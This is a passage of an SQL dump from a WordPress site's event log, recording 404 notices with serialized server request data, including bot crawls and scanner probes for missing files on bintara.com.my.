ST_TIME_FLOAT\";s:15:\"1570407600.6926\";s:12:\"REQUEST_TIME\";s:10:\"1570407600\";}}','notice','2019-10-07 00:20:03','2019-10-07 00:20:01',35021016,36835008,'https://bintara.com.my/?page_id=18',1,0,'191.96.242.118'),(27608,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqIJnKWq-OQ7bMwJVWvJAAAAVY\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.17\";s:11:\"REMOTE_PORT\";s:4:\"5282\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqIJnKWq-OQ7bMwJVWvJAAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570408486.9854\";s:12:\"REQUEST_TIME\";s:10:\"1570408486\";}}','notice','2019-10-07 00:34:50','2019-10-07 00:34:47',34386840,36196808,'https://bintara.com.my/information-security/',1,0,'40.77.167.17'),(27606,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"41.190.232.99\";s:11:\"REMOTE_PORT\";s:5:\"46422\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqC-YMFLk21hQvqQVu@qwAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570407165.6596\";s:12:\"REQUEST_TIME\";s:10:\"1570407165\";}}','notice','2019-10-07 00:12:47','2019-10-07 00:12:46',35021824,36834488,'https://bintara.com.my/?page_id=18',1,0,'41.190.232.99'),(27605,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/wp-blog.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-blog.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZqCLIMFLk21hQvqQVu@LgAAAcQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-blog.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqCLIMFLk21hQvqQVu@LgAAAcQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.109.80\";s:11:\"REMOTE_PORT\";s:5:\"43122\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-blog.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqCLIMFLk21hQvqQVu@LgAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1570406956.83\";s:12:\"REQUEST_TIME\";s:10:\"1570406956\";}}','notice','2019-10-07 00:09:19','2019-10-07 00:09:17',35427560,37227344,'https://bintara.com.my/wp-blog.php',1,0,'167.71.109.80'),(27604,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/wp-blog.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-blog.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZqCJoMFLk21hQvqQVu@LAAAAc4\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-blog.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZqCJoMFLk21hQvqQVu@LAAAAc4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.109.80\";s:11:\"REMOTE_PORT\";s:5:\"41070\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-blog.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-blog.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZqCJoMFLk21hQvqQVu@LAAAAc4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570406950.9615\";s:12:\"REQUEST_TIME\";s:10:\"1570406950\";}}','notice','2019-10-07 00:09:12','2019-10-07 00:09:11',35037680,36842368,'https://bintara.com.my/wp-blog.php',1,0,'167.71.109.80'),(27603,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3315.3 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"181.211.34.227\";s:11:\"REMOTE_PORT\";s:5:\"49882\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZp@osAZj7RBQ-icbk@3NgAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570406050.4906\";s:12:\"REQUEST_TIME\";s:10:\"1570406050\";}}','notice','2019-10-06 23:54:13','2019-10-06 23:54:10',35423592,37230760,'https://bintara.com.my/?page_id=18',1,0,'181.211.34.227'),(27602,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"337-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"337-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"337-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuV3KWq-OQ7bMwJVWprgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuV3KWq-OQ7bMwJVWprgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"27716\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuV3KWq-OQ7bMwJVWprgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401879.7736\";s:12:\"REQUEST_TIME\";s:10:\"1570401879\";}}','notice','2019-10-06 22:44:41','2019-10-06 22:44:40',35049928,36859960,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27601,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"458-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"458-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"458-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuTIMFLk21hQvqQVuz2QAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuTIMFLk21hQvqQVuz2QAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"26674\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuTIMFLk21hQvqQVuz2QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401868.1595\";s:12:\"REQUEST_TIME\";s:10:\"1570401868\";}}','notice','2019-10-06 22:44:29','2019-10-06 22:44:28',35049928,36859960,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27292,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/lfm.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/lfm.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZAJSnupQ8972QULTgy1oQAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/lfm.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZAJSnupQ8972QULTgy1oQAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"67.231.28.145\";s:11:\"REMOTE_PORT\";s:5:\"48039\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s